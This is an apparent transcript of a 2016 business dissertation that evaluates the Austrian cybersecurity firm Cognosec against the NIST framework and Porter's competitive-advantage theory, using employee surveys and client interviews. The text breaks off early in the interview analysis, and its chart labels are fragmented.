dissertation - cyber security
TRANSCRIPT
1
Can SMEs develop competitive edge through cybersecurity?
Case Study of Cognosec
Dissertation
Submitted by – Alysha Paulsen – S00601824
Submission date – 22/04/2016
2
ABSTRACT
The research has a two-fold purpose. Firstly, it evaluates the cyber security services provided by
an Austrian firm COGNOSEC in light of the NIST framework for cyber security. Second, it
critically analyzes whether COGNOSEC holds competitive advantage in the ITC security market
and whether it is able to provide the same to its clients or not. Research first uncovers existing
published facts through literature review. Based on this research, primary data acquisition tools
are devised. Survey questionnaire collects quantitative data from COGNOSEC employees whereas
semi-structured interviews with COGNOSEC clients and ITC industry analyst provide qualitat ive
data. COGNOSEC’s service model is compatible with service standards in most cyber security
markets. Customers are satisfied and brand equity for the firm is high. COGNOSEC leads the
market through service differentiation and provides its SME clients cyber security system that
integrates with other management systems at firm level. However, the firm can benefit by
introducing more post-purchase services and can maintain sustainable competitive advantage by
designing HRM policies to attract the best talent. Research has highlighted the need for cyber
security in SMEs. For managers in the cyber security industry, the research has outlined key
recommendations to maintain sustainable competitive advantage. Evaluation of cyber security
services under NIST framework has never been conducted before. The study has also shown how
cyber security can lead to competitive advantage for SMEs.
Keywords
COGNOSEC, cyber security, SMEs, NIST framework, competitive advantage, Porter’s generic
forces
3
CONTENTS
1. Introduction .......................................................................................... 5
1.1 Research Rationale.................................................................................................5
1.2 Research Aim .........................................................................................................6
1.3 Research Objectives ...............................................................................................7
2. Literature Review .................................................................................. 7
2.1 Cyber security trends in SMEs ...............................................................................8
2.2 NIST Framework for cyber security evaluation .....................................................9
2.3 Factors affecting efficacy of cyber security services..............................................13
2.4 Theoretical framework of competitive advantage.................................................15
2.5 Literature gaps .....................................................................................................17
3. Research Methodology ......................................................................... 18
3.1 Research Philosophy ............................................................................................18
3.2 Research Approach ..............................................................................................18
3.3 Research Design ...................................................................................................19
3.4 Data Collection .....................................................................................................19
3.4.1 Survey methodology...................................................................................20
3.4.2 Interview methodology ...............................................................................20
3.5 Sampling Strategy ................................................................................................21
3.6 Reliability & Validity ...........................................................................................21
3.7 Ethical Considerations .........................................................................................21
4. Findings and Analysis .......................................................................... 22
4.1 Survey Analysis ....................................................................................................23
4.2 Interview Analysis ................................................................................................26
4.3 Overall Analysis ...................................................................................................30
5. Conclusions and Recommendations ...................................................... 33
5.1 Conclusion............................................................................................................34
5.2 Recommendations ................................................................................................35
5.3 Theoretical and managerial implications..............................................................36
4
5.4 Future research scope ..........................................................................................36
References .............................................................................................. 36
Appendix: Interview questions ................................................................. 41
Survey Confirmation Letter ..................................................................... 42
Transcripts ............................................................................................. 43
Transcript 1 ...............................................................................................................44
Transcript 2 ...............................................................................................................45
Transcript 3 ...............................................................................................................47
Transcript 4 ...............................................................................................................48
EXHIBITS
Exhibit 1: Cyber security breaches and cost .........................................................................6
Exhibit 2: Growth forecasts for cyber security businesses in UK ..........................................6
Exhibit 3: NIST framework ................................................................................................11
Exhibit 4: NIST implementation plan .................................................................................13
Exhibit 5: Porter's Generic Strategies.................................................................................17
Exhibit 6: Employees’ perception of COGNOSEC’s cyber security services.......................25
Exhibit 7: Which task is COGNOSEC best at? ...................................................................25
Exhibit 8: What are core barriers and challenges faced by COGNOSEC? .........................25
Exhibit 9: What are some future opportunities for COGNOSEC?......................................26
Exhibit 10: COGNOSEC service model reviewed in light of NIST Framework ..................33
5
1. INTRODUCTION
As the world modernizes and the Internet takes up significant space in businesses, demand for
cyber security is going up. Small and Medium Enterprises (SMEs) are not far behind the larger
corporations in their search for cyber security solutions and are looking for proactive formulas to
mitigate risks of cyber breaches, espionage, data theft and financial frauds. In June 2012, MI5
Director noted that the scale of these cyber threats is astounding for businesses (Harris & Patton,
2014). This increasing importance has given rise to a new industry niche in the IT domain – cyber
security sector. This research seeks to understand how cyber security providers can provide
competitive advantage to their SME clients through service differentiation and cost structures.
1.1 RESEARCH RATIONALE
The extent and magnitude of cybercrimes in businesses is increasing at an astonishing rate.
Exhibit 1 shows the cyber-security breaches reported and the losses incurred by companies as a
result of these breaches. In 2013, SMEs in the UK suffered between GBP 35,000 to 65,000 in
losses due to lax security (Valenzano, 2014). Exhibit 2 shows that the business IT security industry
is set to grow by GBP 0.6 billion in 2017 (Harris & Patton, 2014). This indicates the increasing
demand of cyber security in the SME sector.
Therefore, cyber security providers have emerged as key business consultants for SMEs in recent
years. While the literature is rife with research on threats emanating from cyber security breaches
and possible solutions (Sangani & Vijayakumar, 2012); little has been said about the profitability
(and losses) of investing in cyber security for SMEs. Many SME managers consider cyber security
to simply be and insurance cost (Julisch, 2013). But can it be more than just an insurance? Could
it bring competitive advantage to businesses? The answers to these questions are actively being
sought by theorists, industry analysts and policymakers in the business.
This research will evaluate the cyber security model of an Austrian company ‘COGNOSEC’ which
helps local SMEs and other clients manage their security. By identifying the strengths and
weaknesses of their model in light of standardized theoretical frameworks, the researcher will be
6
able to reach a conclusion whether COGNOSEC is able to provide competitive advantage to its
SME clients, through cost leadership and service differentiation. By conducting this analysis, the
study establishes the importance of cyber security as a tool for competitive advantage in the SMEs.
Exhibit 1: Cyber security breaches and cost
Source: Valenzano (2014)
Exhibit 2: Growth forecasts for cyber security businesses in UK
Source: Harris & Patton, 2014
1.2 RESEARCH AIM
The research aim is to understand the cyber security model of the Austrian firm COGNOSEC and
evaluate it against the generic NIST framework of cyber security in order to assess the key
strengths and weaknesses of the company’s model. Based on these strengths and weaknesses,
researcher concludes whether COGNOSEC itself leads market competition; and whether it is able
to provide competitive advantage to its SME clients through services and costs it offers, or not. In
7
other words, the research explores whether COGNOSEC services can be just more than a security
exercise for SME clients and whether it could amplify profitability of these clients or not.
1.3 RESEARCH OBJECTIVES
Research objectives are:
To outline the key features of COGNOSEC cyber security model;
To evaluate the cyber security model of COGNOSEC in light of theoretical framework of
the NIST model
To identify the key strengths and weaknesses of the COGNOSEC model; and
To assess whether COGNOSEC is a market leader and whether it can provide competitive
advantage to its SME clients on the basis of the cyber security services it offers.
2. LITERATURE REVIEW
In this chapter, the researcher reviews existing trends in the cyber security market. He does so by
analyzing the demand for cyber security services and the customer perceptions regarding service
8
providers. Researcher then introduces the reader to the NIST framework, which is used later in
this research to analyze COGNOSEC’s service model (see chapter 4 for analysis). The factors
affecting cyber security model’s efficiency are outlined to intimate the reader with the key
characteristics that can strengthen or weaken the security paradigm. Finally, competitive advantage
is elaborated using theoretical frameworks. These frameworks are also applied later in the research
(in chapter 4) to evaluate COGNOSEC in terms of market performance.
2.1 CYBER SECURITY TRENDS IN SMES
Cyber security threats in the 21st century are not limited to a country or a region. The scope of this
menace has spread across the globe at an accelerated pace in recent years and has hit industrial and
financial sectors very hard (Harris & Patton, 2014). Cyber security threat can come from individua l
hackers at both small and large scale, groups that attempt activism through cyber hacking,
intelligence groups as well as organized crime cells (Macdonald et al., 2013). None of these threats
can be considered lower in magnitude as each has the capability to hurt organizations in
irrecoverable ways (Wamba & Carter, 2014). As the global security threat looms larger over the
industrial sector, the demand for individuals with cyber security skills is on the rise, reaching as
high as 13.2% increase per year, according to estimates by the Global Information Security
Workforce Study by Frost and Sullivan consultants (Henson & Garfield, 2015).
This gives rise to one of the most serious challenges anticipated in the cyber security industry in
the coming years (Macdonald et al., 2013). The inability of institutions to produce enough
graduates equipped with the skills required to combat these ever-evolving threats posed by cyber
security is a dilemma for policymakers (Harris & Patton, 2014). This concern has been echoed by
the National Audit Office Landscape Review on the UK Cyber Security Strategy as well as the
Competitive analysis of the UK cyber security sector produced by Wamba & Carter, (2014). The
security aspect related to cyber set up is not limited to technological glitches but also results from
human failings and security culture (Julisch, 2013). In the UK during 2011 alone, 44 million cyber-
attacks were reported. Of these 98% were carried out from outside the UK (Harris & Patton, 2014).
The total losses resulting from these attacks amount to a staggering GBP 21 billion, through IPR
losses, financial theft and break in the operational activity (Macdonald et al., 2013).
9
Besides the immediate problems of financial and data losses, there are long-term issues for victim
organizations. Once the data system of an organization has been breached, it becomes difficult for
it to gain the trust of other firms it wishes to indulge in business with (Ruiz-Vanoye et al., 2012).
Recent reports suggest 58% companies are unwilling to work with such organizations (Harris &
Patton, 2014). Despite the increase in cyber security threat by almost 50% each year, the efforts of
these firms in terms of data management remain ambiguous (Ruiz-Vanoye et al., 2012).
A successfully orchestrated cyber-attack can cost tens of thousands of dollars in damages to
globally operating firms in addition to tarnishing of the brand name (Leung, 2012). An example
here is of the hacking of Sony PlayStation. The UK Information Commissioners Office later
showed that the incident was easily avoidable and data of thousands of people worldwide could
have been safeguarded (Wilkin, 2012). Subsequently, the firm was called before the US Congress
and fined GBP 250,000 by the UK regulators. Sony suffered massive distrust from its customer
markets (Harris & Patton, 2014).
According to Mowbray (2013), the number of security breaches for both small and large firms has
increased by almost 50% over the course of just one year. Foreign parties were involved in almost
78% breaches for larger companies and 63% for small firms (Awasthi, 2015). Despite the
willingness of senior management to strengthen cyber security, the process remains slow due to
inefficient financial adjustment. Cyber breaches connected to employees have been recorded at
84% of large businesses and 57% of small businesses (Johnson, 2013).
The 2013 Information Risk Maturity Index, collated by PwC and Iron Mountain and Government
Communications Headquarters (GCHQ) states that efficient steps can prevent almost 80% of such
breaches (Awasthi, 2015). However, 12% respondents were of the opinion that most security
breaches occur due to unwillingness of senior management to take the issue seriously (Awasthi,
2015).
2.2 NIST FRAMEWORK FOR CYBER SECURITY EVALUATION
The “Framework for Improving Critical Infrastructure Cybersecurity” (hereafter referred as the
‘NIST framework’) was devised by NIST in 2014 and is a comprehensive guideline for developing
cyber security for critical infrastructures. It is generic model presenting standardized steps
10
involved in establish cyber security in business. The framework is illustrated in exhibit 3.
However, Osborn & Simpson (2015) have shown that the NIST framework is applicable to all
types of organizations and industries.
The framework consists of five functions: Identify, Protect, Detect, Respond, Recover. These
functions are then sub-divided into various categories. The first function is to ‘identify’. Henson
and Garfield (2015) noted that this step is fundamental to laying foundation for effective use of
the NIST framework. It involves developing an organization-wide understanding of the perceived
cyber security risks to assets, data and infrastructure (Kagan & Cant, 2014). Outcomes of this
function include asset management, governance, risk assessment and risk management. Next, the
‘protect’ theme is where the actual process of implementation begins. It limits the potential of a
cyber security threat from harming critical infrastructure services (Kurpjuhn, 2015). Sangani &
Vijayakumar (2012) suggested that here, data security; protective technology, awareness and
training and access control are the outcomes. In the third function ‘detect’, reactive measures are
taken to identify any threat that is coming the organization’s way. This timely discovery allows
company to safeguard itself. Detection processes, anomalies and continuous monitoring are the
outcomes. In the fourth step, ‘respond’ is the systematic reaction to the threats detected in previous
phase (Sanchez et al., 2008). Response planning, communication, analysis and improvements are
included in this function. Finally, ‘recover’ is a treatment rather than preventive, method
(Kurpjuhn, 2015). In this function, any impaired data (due to an attack) is recovered and
capabilities are restored. It involves recovery planning, communication and improvements.
Exhibit 4 shows the roadmap for implementation of the NIST framework. A hierarchical model,
with ‘executive’ at the top followed by business/process managers and finally
implementation/operation personnel is proposed. The executive branch sets the mission and policy
for implementation. The business/process level management calculates risk and assigns tasks to
the operational teams. The task of implementation on-ground is assigned to operational
management, which reports to the business management, which in turn reports to executive
(Goucher, 2011). This hierarchical arrangement allows grass-roots implementation of the
framework and continuous improvement to the process. The roadmap also enables a company-
wide integration of the mechanism into company operations policy (Leung, 2012).
11
Certain other cyber security frameworks as suggested by Goucher, (2011) and (Leung, 2012) have
outlined the tools and techniques that may be employed to achieve each objective function of the
cyber security process. The NIST framework is different in that, it lists the outcome for each
function and allows user the flexibility to choose tools to reach that outcome. Kurpjuhn, 2015 notes
that some organizations may be disappointed that the ‘how’ of achieving the objectives is not
shown by the framework. Nonetheless, the framework does suggest certain other standards against
each sub-category to help user reach end goals. Goucher (2011) believes that the NIST framework
can also serve as an ‘Enterprise Architecture’ i.e. it can work in parallel with the business model
or can be integrated into the overall business model itself. It also includes features of risk
management, planning and mitigation (Leung, 2012).
Exhibit 3: NIST framework
13
Exhibit 4: NIST implementation plan
2.3 FACTORS AFFECTING EFFICACY OF CYBER SECURITY SERVICES
According to Kagan & Cant (2014), cybersecurity can be envisioned as an ‘arms race’ between
attackers and defenders. ICT systems tend to be very complex. Any inherent weakness or loophole
in programming can allow attackers to enter the system and wreak havoc (Kurpjuhn, 2015). While
defenders can strive to cover these loopholes, there are certain challenges.
Firstly, ‘insiders’ with access to the system pose a great risk (Boyer & McBride, 2009). Jennex &
Addo (2004) terms this as the ‘human factor’ in cyber security. Kurpjuhn (2015) notes that human
factors can have considerable impact of cyber security output of a company despite state-of-the-
art software and mechanisms behind ICT and system protection. Leung (2012) further warns that
external threats are not perhaps as important as internal ones and companies should spend more
on internal threat mitigation instead of investing in biometrics and smart cards etc. Kurpjuhn
(2015) explains these threats may not come deliberately from employees’ malicious intentions
14
against the company but may simple stem from user carelessness, errors and omissions and relaxed
SOPs regarding data security.
Ruiz-Vanoye et al., (2012) notes that ‘supply chain vulnerabilities’ can also lead to compromised
cyber security for the organization. These vulnerabilities can permit attackers to insert malic ious
software (and/or hardware) during acquisition. Goucher (2011) notes that management of both
‘physical’ and ‘informational’ supply chains is therefore necessary for minimizing these
vulnerabilities. In addition, Julisch (2013) contends that human factor can add to the vulnerabilit ies
when some insiders can exploit these weaknesses to obtain sensitive data from company systems.
Recently, another factor that was previous not well-known, has been identified. Termed as the
‘zero-day’, it refers to vulnerabilities with no established fix (Harris & Patten, 2014). The vendor
does not know of the ‘security hole’ and attackers discover it before the vendor. This can lead to
exploitation by attackers if vendor is unable to close the hole before attackers get to it (Kozik &
Choras, 2013). This leads zero-day attacks to be largely ‘unknown’ in nature. Many large IT firms
have had to either personally suffer or have their clients suffer, embarrassing zero-day attacks. In
2013, Java released two emergency patches to cover critical vulnerabilities (Sangani &
Vijayakumar, 2012). Similarly, a highly sophisticated exploitation tool was found that bypassed
Acrobat Reader 10 and 11 on both Windows and Mac devices (Valenzano, 2014).
Another important factor seen to affect cyber security systems in SMEs was leadership and cyber
skills. Julisch (2013) in the research stated that majority of the participants noted that their
organizations had internal cyber security skill shortages. Some respondents also said that the
organizational management was not keen on investing in cyber security as they often did not
perceive the scope of this potential threat (Leung, 2012). These findings show that organizationa l
management/leadership and internal skillset both are important in forwarding the concept of cyber
security within the organization. Besides these factors, regulatory frameworks, industr ia l
awareness, business nature and level of threats also determine efficiency of cyber security models
in organizations (Harris & Patten, 2014).
15
2.4 THEORETICAL FRAMEWORK OF COMPETITIVE ADVANTAGE
In his theory of generic strategies for competitive advantage, Michael Porter (1985) explains
competitive advantage as value created by a firm, which forms the basis of competitive advantage
(see exhibit 5). When the value created exceeds the production cost, or when lower prices than the
market competitions are being offered for similar benefits, the firm is said to have scored a
competitive advantage (Hitt et al., 2012). Cost leadership and differentiation are two most common
forms of competitive advantage.
The competitive advantage and scope chosen by a firm dictates its place in the market (Grundy &
Moxom, 2013). Strategic positions are characterized at both simple and broad levels through
generic strategies. A difference between broad and narrow segments is achieved through
competitive scope. Each option has associated risks but it is important to choose a strategy in
order to excel (Joyce, 2015). According to the generic framework introduced by Grundy & Moxom
(2013) for competitive advantage; product leadership, operational excellence, and/or customer
intimacy can be chosen as foundations.
Another theory that seeks to explain competitive advantage is the RBV framework. Both the
internal and external industry aspects are integrated through the RBV framework. According to
Hill et al., (2014) the RBV, resources differ for each company, as they are likely to have entirely
different understandings of physical and intangible assets and capacities. This is similar to core
competency and capability frameworks (Grundy & Moxom, 2013). Resources may be physical in
the form of property or finances. They can also be intangible such as information and skill or they
can be organizational in the form of processes etc. Ownership of resources is the basis of
competitive advantage. As each firm differs on the basis of its staff, expertise, processes and
experience, the resources of each company are also different. By utilizing their resources and
capabilities, firms can score competitive advantage (Joyce, 2015).
In the USD 75 billion cyber security industry service differentiation is a key strategy for business
growth as newer and newer threats keep emerging (Osborn & Simpson, 2015). Currently, highest
growth rates are estimated in the security analytics, threat intelligence and cloud security domains
(Johnson, 2013). The demand for cyber security is especially high in the retail industry segment
16
and the general e-commerce market (Mowbray, 2013). According to Ali et al., (2013), investors
are now looking for ITC security solutions that can integrate with other organizational functions
and can provide larger multi-dimensional solutions.
17
Exhibit 5: Porter's Generic Strategies
Source: Porter, 1985
2.5 LITERATURE GAPS
It is an unexceptionable fact that the cyber problem is bigger than ever. With estimated global e-
commerce value of USD 572 billion, the cyber realm offers lucrative opportunities to a new
generation of scammers and white-collar criminals (Henson & Garfield, 2015). While much has
been said about the possible risks of cyber security in the 21st century and their solutions, the
available literature is largely silent on how cyber security insurance and investment can be made
into competitive advantage for the company. Moreover, case studies showing the core strengths of
cyber security services valued by SME clients are absent. It is necessary to explore this subject
from the viewpoint of SMEs as client of security providers as they will be the largest investors in
the coming age of cyber security. Therefore, this research will aim to fill in these gaps by
conducting a case study on a prominent cyber security firm and generating data to understand
competitive advantage provided by cyber security systems, to SME clients.
COMPETITIVE ADVANTAGE
COMPETITIVE
SCOPE
Lower Cost Differentiation
Broad
Target
Narrow
Target
1. Cost Leadership 2. Differentiation
3A. Cost Focus 3B. Differentiation
Focus
18
3. RESEARCH METHODOLOGY
In this chapter, the research philosophy, the adopted approach and the research design will be
covered comprehensively. In addition to that, the process used for collection of data, its analysis
and the process for conducting analysis will be explained. This chapter also highlights the ethical
considerations that must be taken into account during the research.
3.1 RESEARCH PHILOSOPHY
In order to reach reliable conclusions, researchers suggest the use of multiple integrat ive
approaches that can be employed instead of a single approach (Silverman, 2013). Moreover,
directive approaches should be re-tracked in order to gain more reliable and authentic results (Yin,
2014). To achieve this, the researcher applies the ‘interpretivist’ philosophy. In the interpretivism
philosophy, it is when an interpretivist analyses various study’s elements in order to interpret them.
This interpretation involves scrutinizing reality in order to formulate relevant conclusions. It
focuses on integrating the human element within the research. The assumption of the interpretive
researchers is that there are structures even in social realities such as shared definitions, language,
consciousness, instruments and etc. (Myers, 2009). As a result, researchers try to interpret these
structures for the purposes of analysis. The interpretivist philosophy was initially developed in
order to critique positivism regarding the social sciences.
According to the understanding of Yin (2014), the best methodology is to avoid interna l
involvement when analyzing the problem and use multi-dimensional analyses to reach
conclusions. Therefore, the researcher has sought to apply a variety of approaches to target the
issue from both qualitative and quantitative aspects using primary research methods.
3.2 RESEARCH APPROACH
Chapter 1 indicates the aim of this research, which is to analyze the cyber security model of
COGNOSEC and evaluate it against the NIST framework, as well as to evaluate competitive
advantage of this model. Towards this end, the researcher primarily targets company stakeholders
including customers/clients and employees. It also involves IT security industry analysts. In
addition to this, the study puts forward suggestions and recommendations that will help strengthen
19
competitive advantage of COGNOSEC in the market and allow SMEs to develop the same using
cyber security frameworks. To achieve the aims and objectives set forth for this research (see
chapter 1), the research has found the inductive approach to be most suitable. To gain a more in-
depth understanding of the subject under investigation, both qualitative and quantitative evaluation
has been conducted. This has been done to enable the researcher to explore the subject from various
angles. The data gathered from primary research tools will then be studied in light of literature
published on the subject (see chapter 2 for literature review). The main benefit of using an
inductive approach is the opportunity of generalization that it allows. The results of the study can
be propagated on the general cyber security industry and the SME sector.
3.3 RESEARCH DESIGN
Research design is important to a researcher as it sets forth the path that will be adopted in order
to collect the required data and to reach reasonable conclusions. Research designs can be classified
into exploratory, applied or descriptive designs (Yin, 2014). To study this subject in greater detail,
the researcher has opted for the exploratory research design (Creswell, 2009). The purpose behind
choosing an explorative research style is to touch upon subjects that are yet to be studied in detail.
In this way, the researcher can also add information previously missing from literature. The
opinion of researchers regarding research approach is divided. According to Collis & Hussey
(2003), the best means to understand a given subject is through direct research. On the other hand,
conduction of case studies is favored by Silverman (2013). This opinion of selecting case studies
for researching any subject has been supported by Yin (2014) as well. In addition to the use of case
study approach, Collis (2003), Saunders (2007) and Jackson (2014) suggest the integration of the
qualitative approach alongside it. Therefore, this research has used case study design along with
qualitative research, to achieve its objectives.
3.4 DATA COLLECTION
To identify the literature gaps and set the direction for research, the researcher began by conducting
literature review of published findings. Here, academic documents (from books, journals and other
sources), company reports, periodicals and government findings were analyzed. This set of
20
information constituted secondary data. Silverman (2013) defines secondary data as the material
that has already been published and known.
Based on this secondary data, the researcher then set the context for primary research. Primary
research is used to address the gaps identified through literature review (see section 2.5. For this
research, the researcher chose two primary research tools: survey questionnaire and semi-
structured interviews. The former tool allowed gathering of quantitative data that was analyzed
using statistical software (MS Excel). Myers (2009) notes that quantitative data can play a major
role in scientific research as it allows measurement and standardization of findings. It also helps
strengthen researcher’s argument(s) by providing concrete supportive arguments (Miller & Miller,
2010).
3.4.1 SURVEY METHODOLOGY
For the survey questionnaire, a set of four questions based no MCQs (Likert scale) was designed.
Open ended and close-ended questions were included. In some questions, only one possible option
choice was provided whereas in others, more than one option could be selected. This decision was
based on the nature of question. The surveys were conducted with a total of 12 COGNOSEC
employees serving in managerial as well as technical/operational positions. The small number of
sample was taken, as most of the employees working for COGNOSEC are not allowed to share
their views or opinions due to legal reasons. All respondents were males (as COGNOSEC
employees are largely male). Employees were first briefed about the survey and then sent the
questions through an online portal of COGNOSEC. Additional comments of employees were also
noted where relevant and provided. Note here that survey questions were technical in nature as
COGNOSEC employees were well aware of the terminologies and technicalities of cyber security
domain. The survey exercise was only conducted with employees and was aimed at achieving the
first two research objectives (see section 1.3 in chapter 1). In other words, surveys were meant to
explore the strengths and weaknesses as well as opportunities of the COGNOSEC cyber security
service model. The survey questions are listed in chapter 4 section 4.1. Due to CONNOSEC data
protection policy the survey file used to collect the findings is not attached in the appendix section.
3.4.2 INTERVIEW METHODOLOGY
21
For the semi-structured interviews, four open-ended questions were devised. These interviews
were conducted face-to-face with four respondents. Three of the respondents represented former
COGNOSEC clients. They were SME representatives from retail, e-commerce and business
consultancy sectors. The fourth respondent was a local IT security industry analyst who was
included in the panel to diversify opinion. Due to their busy schedule and data protection
limitation. Each interview took approximately 15 minutes. Interviews were aimed at achieving
objectives 3 and 4 (see section 1.3 of chapter 1). In other words, COGNOSEC clients and industry
analyst were involved to gather opinion on competitive advantage of the COGNOSEC cyber
security services for both the company and its clients. The findings of both survey and interview
research are presented in chapter 4 along with a detailed analysis based on secondary research.
3.5 SAMPLING STRATEGY
According to Yin (2014), population is comprised of the people who will be affected due to the
subject that is studied in the research. In majority of the researches, it is an arduous endeavor to
completely scrutinize the completely population which has been impacted. As a result, researchers
normally acquire samples which represent the population so that the findings can be generalized.
In this research, the purposive sampling method is used to choose the participants for the sample.
Thus, 12 managers of COGNOSEC were selected for the survey where from the client’s of
COGNOSEC four SMEs, managers were selected.
3.6 RELIABILITY & VALIDITY
The research’s validity deals with the satisfaction of the objectives if the researcher managed to
do so. For this study the reliability is ensured if the results from the interviews were complete and
consistent or not. This was done by checking the recordings and the notes multiple times. There
was also checking on the answers where information on how to content the participants was kept
with their consent should follow-ups be needed. The validity of the answers was ensured by asking
the questions to the relevant employees.
3.7 ETHICAL CONSIDERATIONS
22
According to Yin (2014), ensuring the safety, comfort and privacy of all participants involved is
the responsibility of the researcher. Therefore, for this research, all legal and regulatory aspects
have been taken into account. Moreover, each participant was individually informed of the benefits
and requirements of participating in the study and was also enlightened of what the surveys and
interviews will be focusing on. No participant was approached before prior consent and the data
collected from them was only published after taking them into confidence regarding the
publication nature and purpose. Respondents are more likely to provide honest answers in a
comfortable environment. This was ensured by keeping the interview language simple and
comprehensible. Towards the conclusion of the research, the input of all participants was
appreciated. Strictly following the legal and ethical guidelines has enabled the researcher to make
this study more reliable and authentic; making it even more valuable in the academic field and
beneficial to future researchers.
4. FINDINGS AND ANALYSIS
23
In this chapter, the researcher lays out all the primary research findings from survey and interview
exercises. Methodology and ideology behind primary data collection is already explained in
chapter 3. While both survey and interview findings are critically analyzed while presenting these
findings, an overall analysis has been conducted by the researcher at the end of the chapter to
facilitate reader in understanding key findings of research analysis. Secondary data from chapter
2 and supportive findings from other literature sources are used where necessary. The chapter will,
at the end, provide an illustrative reviewed NIST model for COGNOSEC, based on researcher’s
analytical deductions regarding the company’s service model.
4.1 SURVEY ANALYSIS
The first question of the survey was the most important as it required participants to rate the various
dimensions of their company’s cyber security services on a Likert scale. Respondents’ scores were
then added. The Likert scale is explained in chapter 3 in more detail. Exhibit 6 below gives the
graphical representation of employees’ responses to this question. The services on the graph are
arranged in descending order from left to right (service with highest score is on left most column
whereas that with lowest score is on the right most column of graph). It may be observed that
respondents voted ‘integration with other financial, logistics, communication and business
systems’ as the core strength of COGNOSEC’s cyber security service to SMEs. This was indeed
interesting to note for the researcher. It shows that COGNOSEC believes in providing a framework
which can also serve as an aide to overall business planning and management in SMEs. Similar ly,
‘data and system security services’ as well as ‘risk assessment, management and mitigation’ both
earned cumulative score above 25 points. Together, these three features were rated by respondents
to be the strongest features of COGNOSEC cyber security services.
It is also interesting to note that ‘training and awareness’ received an overall low score of only
18.5 by respondents. In additional comments, some respondents noted that while COGNOSEC
provided state-of-the-art solutions and proactive detection technology, it was not keen on training
its clients beyond the basics of using its own software and tools. Continual improvement was rated
low. This is most likely because COGNOSEC generates recurrent customers by providing
incremental services. In the initial phase, one level of protection is implemented, then the second
24
and third. This allows COGNOSEC to generate more revenues and also helps client gain expertise
in cyber threat management. Some respondents also noted price as a deterrent for customers.
The second survey question was straightforward and asked respondents to evaluate which service
domain COGNOSEC excelled at. Respondents were asked to choose only one option to get a fair
idea of which single area of service they considered strongest at COGNOSEC. The five options
provided were according to the five functions of the NIST framework (see chapter 4). Out of the
seven respondents, three (the largest majority) identified that ‘protection of their client’ was their
strongest feature. This protection included technological and infrastructure solutions to cope with
threats previously identified by either the SME or COGNOSEC itself. As discussed above,
COGNOSEC differentiates between ‘consultancy’ services, which focus on threat identificat ion.
But its true strength lies in providing best solutions to counter any threats. Only one respondent
each identified detection of threat and recovery of data as COGNOSEC’s strengths. This may be
that perhaps COGNOSEC has not had much experience in the domains of threat detection and
recovery for local clients (see exhibit 7).
The next question then explored employees’ opinion on the threats they perceived the company
currently faced. Here, respondents were given the flexibility of choosing more than one option.
Interestingly, five of the seven respondents said that ‘probability of imitation of their service
model’ by local competitors was the most important challenge. Another four also noted that
organizational culture could benefit from improvements. None of the respondents identified ‘lack
of technical expertise’ as a problem (see exhibit 8). The researcher believes this might be because
COGNOSEC already has highly talented workforce and sound HRM mechanisms to attract and
retain talent.
Finally, the survey asked respondents to choose (more than one) opportunities from the list
provided, that they thought COGNOSEC has in near future (see exhibit 9). Six of the seven
respondents said the demand for growing cyber security services all over the world will mean big
business for COGNOSEC. Employees also noted that COGNOSEC’s unique service model and
its innovative product was an opportunity in itself as it helps COGNOSEC differentiates itself
from others. One respondent added in extra comments that he believed that international expansion
of COGNOSEC in future, would significantly boost business prospects.
25
Exhibit 6: Employees’ perception of COGNOSEC’s cyber security services
Exhibit 7: Which task is COGNOSEC best at?
Exhibit 8: What are core barriers and challenges faced by COGNOSEC?
29.8 28.726.8
24.9 24.5 24 23.221.5
19.6 18.5
INT
EG
RA
TIO
N W
ITH
F
INA
NC
IAL
/L
OG
IST
IC
S/
CO
MM
UN
ICA
TIO
N/
BU
SIN
ES
S …
DA
TA
/S
YS
TE
M
SE
CU
RIT
Y
SO
FT
WA
RE
RIS
K A
SS
ES
SM
EN
T,
MA
NA
GE
ME
NT
AN
D
MIT
IGA
TIO
N
PR
OT
EC
TIV
E
TE
CH
NO
LO
GY
PR
OT
EC
TIO
N
AG
AIN
ST
ZE
RO
-DA
Y
AT
TA
CK
S
TH
RE
AT
DE
TE
CT
ION
P
RO
WE
SS
PR
ICE
OF
PA
CK
AG
E
SIM
PL
ICIT
Y O
F U
SE
A
ND
FL
EX
IBIL
ITY
O
F M
OD
IFIC
AT
ION
CO
NT
INU
AL
IM
PR
OV
EM
EN
TS
AW
AR
EN
ES
S A
ND
T
RA
ININ
G
0
3
1
2
1
IDE
NT
IFY
ING
T
HR
EA
TS
FO
R
CO
MP
AN
Y (
AN
D
SU
GG
ES
TIN
G
SO
LU
TIO
NS
)
PR
OT
EC
TIN
G
CL
IEN
TS
AG
AIN
ST
T
HR
EA
TS
(W
HE
N
CL
IEN
TS
ID
EN
TIF
Y
TH
EIR
OW
N
TH
RE
AT
S)
DE
TE
CT
ING
T
HR
EA
TS
(T
HA
T
CL
IEN
TS
DO
NO
T
KN
OW
OF
)
RE
SP
ON
SE
TO
T
HR
EA
TS
(T
EC
HN
OL
OG
ICA
L)
RE
CO
VE
RY
OF
LO
ST
D
AT
A (
WH
EN
C
LIE
NT
HA
S B
EE
N
UN
DE
R C
YB
ER
-A
TT
AC
K)
26
Exhibit 9: What are some future opportunities for COGNOSEC?
4.2 INTERVIEW ANALYSIS
The interview methodology and participant information is also detailed in chapter 3. COGNOSEC
clients and industrial analysts were the participants of this activity for reasons explained in
chapter 3. The first question from respondents was whether they believed that COGNOSEC’s
0
1
3
2 2
4
3 3
5
LA
CK
OF
T
EC
HN
ICA
L
EX
PE
RT
ISE
LA
CK
OF
BU
DG
ET
GO
VE
RN
ME
NT
R
ES
TR
ICT
ION
S A
ND
IN
AB
ILIT
Y T
O
EX
PA
ND
CO
NF
US
ED
CL
IEN
TS
(W
HO
DO
N’T
KN
OW
T
HE
PR
OB
LE
M O
R
DO
N’T
SE
E I
T)
EV
OL
VIN
G N
AT
UR
E
OF
CY
BE
R T
HR
EA
TS
OR
GA
NIZ
AT
ION
AL
C
UL
TU
RE
IS
WE
AK
SE
RV
ICE
PR
ICE
IS
T
OO
HIG
H W
HIC
H
LIM
ITS
OU
R
MA
RK
ET
CO
MP
ET
ITIO
N I
S
TO
UG
H
OT
HE
RS
CA
N
IMIT
AT
E O
UR
M
OD
EL
6
2
4
3
C Y B E R S E C URIT Y D E M A N D IN S M E S
IS G R O W IN G L O C A L L Y
C O M P E TE N T C Y B E R S E C URIT Y
E X P E R TS A R E L IM IT E D
O U R M O D EL IS U N IQ U E A N D
B E T T E R T H A N M A N Y
W E H A V E A H U G E P O R T FOL IO A N D G O O D W O RD - O F-
M O U T H
27
cyber security services were up to the standard and satisfactory to customers or not. To this one
satisfied customer replied:
